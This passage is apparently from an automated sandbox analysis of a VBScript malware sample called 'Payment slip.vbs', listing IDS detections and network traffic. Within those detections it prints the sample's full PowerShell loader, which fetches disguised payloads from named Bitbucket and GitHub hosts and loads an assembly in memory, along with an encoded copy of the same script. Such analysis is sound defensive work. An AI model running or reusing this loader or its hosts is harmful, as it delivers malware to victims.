@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment slip.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment slip.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment slip.vbs", ProcessId: 6944, ProcessName: wscript.exe
                Sigma detected: Usage Of Web Request Commands And Cmdlets
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.dfgdmAI/niam/sdaeh/sfer/k63/312eihcir/moc.tnetnocresubuhtig.war//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Le
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment slip.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment slip.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment slip.vbs", ProcessId: 6944, ProcessName: wscript.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I

                Data Obfuscation

                barindex
                Sigma detected: Powershell download and load assembly
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.dfgdmAI/niam/sdaeh/sfer/k63/312eihcir/moc.tnetnocresubuhtig.war//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Le

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-06T11:23:17.796987+010020576351A Network Trojan was detected185.199.110.133443192.168.2.949709TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-06T11:23:11.536616+010020490381A Network Trojan was detected52.217.123.233443192.168.2.949708TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-06T11:23:17.796987+010028582951A Network Trojan was detected185.199.110.133443192.168.2.949709TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: https://ofice365.github.io/1/test.jpgAvira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: Payment slip.vbsVirustotal: Detection: 16%Perma Link
                Source: Payment slip.vbsReversingLabs: Detection: 13%
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.9:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.217.123.233:443 -> 192.168.2.9:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.9:49709 version: TLS 1.2
                Source: Binary string: protobuf-net.pdbSHA256}Lq source: RegAsm.exe, 00000006.00000002.1642424401.0000000005A20000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: scorlib.pdb.0 source: powershell.exe, 00000004.00000002.1594380828.000001BE2001B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: protobuf-net.pdb source: RegAsm.exe, 00000006.00000002.1642424401.0000000005A20000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: re.pdbc| source: powershell.exe, 00000004.00000002.1594380828.000001BE2001B000.00000004.00000020.00020000.00000000.sdmp

                Software Vulnerabilities

                barindex
                Suspicious execution chain found
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 185.199.110.133:443 -> 192.168.2.9:49709
                Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 185.199.110.133:443 -> 192.168.2.9:49709
                Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 52.217.123.233:443 -> 192.168.2.9:49708
                Source: global trafficHTTP traffic detected: GET /ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /15038381-db7c-497a-b239-00417b221e97/downloads/4d6f306b-216d-4304-9ad4-390a9c315303/test.jpg?response-content-disposition=attachment%3B%20filename%3D%22test.jpg%22&AWSAccessKeyId=ASIA6KOSE3BNJAHMAL6S&Signature=w8QLfWia3a8r%2BiYjjFjFdrPeecE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEMaCXVzLWVhc3QtMSJIMEYCIQCIMRm00Eflqgx92Zb5hjhDlOsAWjcmJXoIzTwy3jhQfQIhAL2iwdNdFh9WQHjU6sfHZcdDgULvyp4qiKvIJJATLWoFKqcCCFwQABoMOTg0NTI1MTAxMTQ2IgwRyvFiO6JYgc%2BWUxcqhALdv3kcJyDGONOnQFWIbYrOg9vq2du%2FAuM22kDUrrliSG6e8KUPlIDC9qm13iyJxS3WTbHFk393gHi3cHle5mk27SW3hViE19830Wj88B8fQdZllu1Zg1uRMD2zgESGYpnPyT6mJ8ARHgwGrUGOezpHUYbtThx6EZSJyeohrS1zvU%2BIH%2B1iIbc41rpO2%2Fj34f01U%2F7um7nRNysJqbB%2BipN2wG1zLj%2BE%2FR%2FAjt6t%2B4wtUO8JXkvKfQdosAcVzhchlRy0%2BYKjFMngCFhEu6%2B%2F%2FVwRSesjel7yahuYGJHPmqIKWxRUp50u7TiCJYi8BLKr2LvaB1TfAc5SMXvUQUF9OIBLOxS3JTDHmpK9BjqcAbjhg3HAai%2BHWzN8tL%2BFKav8G%2F0lvqtkVHS3pSmZUJbbI3e8l6TN%2Fv2BDKf3X43G4EgJgKec2mkK46ZNxvo%2Bwl%2FM6pxAuPWsXeag9ablP25TEL6uZYLZymBRrBNlWRZb5%2BVRPHck0Ly%2FNNnW1Ub4RccRCeKt1jEIP1Ni7%2BZiVgJmd0Lg%2Fb5IB%2B8vLTvEBjyZ%2ByhwUCRzJeKQPJoQgw%3D%3D&Expires=1738839119 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /richie213/36k/refs/heads/main/IAmdgfd.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 185.166.143.48 185.166.143.48
                Source: Joe Sandbox ViewIP Address: 185.199.110.133 185.199.110.133
                Source: Joe Sandbox ViewIP Address: 185.199.110.133 185.199.110.133
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: unknownTCP traffic detected without corresponding DNS query: 172.81.130.34
                Source: global trafficHTTP traffic detected: GET /ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /15038381-db7c-497a-b239-00417b221e97/downloads/4d6f306b-216d-4304-9ad4-390a9c315303/test.jpg?response-content-disposition=attachment%3B%20filename%3D%22test.jpg%22&AWSAccessKeyId=ASIA6KOSE3BNJAHMAL6S&Signature=w8QLfWia3a8r%2BiYjjFjFdrPeecE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEMaCXVzLWVhc3QtMSJIMEYCIQCIMRm00Eflqgx92Zb5hjhDlOsAWjcmJXoIzTwy3jhQfQIhAL2iwdNdFh9WQHjU6sfHZcdDgULvyp4qiKvIJJATLWoFKqcCCFwQABoMOTg0NTI1MTAxMTQ2IgwRyvFiO6JYgc%2BWUxcqhALdv3kcJyDGONOnQFWIbYrOg9vq2du%2FAuM22kDUrrliSG6e8KUPlIDC9qm13iyJxS3WTbHFk393gHi3cHle5mk27SW3hViE19830Wj88B8fQdZllu1Zg1uRMD2zgESGYpnPyT6mJ8ARHgwGrUGOezpHUYbtThx6EZSJyeohrS1zvU%2BIH%2B1iIbc41rpO2%2Fj34f01U%2F7um7nRNysJqbB%2BipN2wG1zLj%2BE%2FR%2FAjt6t%2B4wtUO8JXkvKfQdosAcVzhchlRy0%2BYKjFMngCFhEu6%2B%2F%2FVwRSesjel7yahuYGJHPmqIKWxRUp50u7TiCJYi8BLKr2LvaB1TfAc5SMXvUQUF9OIBLOxS3JTDHmpK9BjqcAbjhg3HAai%2BHWzN8tL%2BFKav8G%2F0lvqtkVHS3pSmZUJbbI3e8l6TN%2Fv2BDKf3X43G4EgJgKec2mkK46ZNxvo%2Bwl%2FM6pxAuPWsXeag9ablP25TEL6uZYLZymBRrBNlWRZb5%2BVRPHck0Ly%2FNNnW1Ub4RccRCeKt1jEIP1Ni7%2BZiVgJmd0Lg%2Fb5IB%2B8vLTvEBjyZ%2ByhwUCRzJeKQPJoQgw%3D%3D&Expires=1738839119 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /richie213/36k/refs/heads/main/IAmdgfd.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                Source: global trafficDNS traffic detected: DNS query: 90.156.5.0.in-addr.arpa
                Source: powershell.exe, 00000004.00000002.1594966229.000001BE21C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.1926563968.000001C02E96C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1594966229.000001BE219F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000004.00000002.1594966229.000001BE21C12000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: RegAsm.exe, 00000006.00000002.1629135916.00000000045CE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000006.00000002.1629135916.000000000460F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
